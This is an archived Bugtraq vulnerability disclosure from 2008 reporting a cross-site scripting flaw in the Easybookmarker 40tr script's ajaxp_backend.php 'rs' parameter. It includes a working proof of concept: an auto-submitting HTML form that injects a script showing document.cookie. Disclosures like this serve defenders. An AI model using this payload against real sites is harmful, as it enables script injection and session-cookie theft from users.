Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani

Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani

From: <irancrash_at_gmail.com>
Date: Sat, 19 Jul 2008 06:22:52 -0600
('binary' encoding is not supported, stored as-is) ----------------------------------------------------------------

Script : Easybookmarker 40tr

Type : Xss Vulnerability

Method : POST

Alert : High

----------------------------------------------------------------

Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

My Offical Website : http://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

----------------------------------------------------------------

Khashayar Fereidani Offical Website : http://FEREIDANI.IR

----------------------------------------------------------------

Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip

----------------------------------------------------------------
Xss Vulnerability :

Variable : rs
Send Method : POST

Set rs variable with post method in ajaxp_backend.php : <script>alert('xss')</script> for test vulnerability

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://example/zomplog/ajaxp_backend.php"

method="POST" name="form">

<input type="hidden" name="rs" value="&#x22;&#x20; <script>alert(document.cookie)</script>">

</form>
</body>
</html>

----------------------------------------------------------------

                        Tnx : God

                     http://IRCRASH.COM

----------------------------------------------------------------
Received on Jul 21 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]